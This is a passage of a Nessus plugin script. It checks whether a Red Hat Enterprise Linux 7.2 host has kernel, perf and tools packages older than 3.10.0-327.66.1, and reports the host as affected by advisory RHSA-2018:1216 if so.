script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^7\\.2([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.2\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1216\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", reference:\"kernel-abi-whitelists-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", reference:\"kernel-doc-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.66.1.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"2\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.66.1.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}}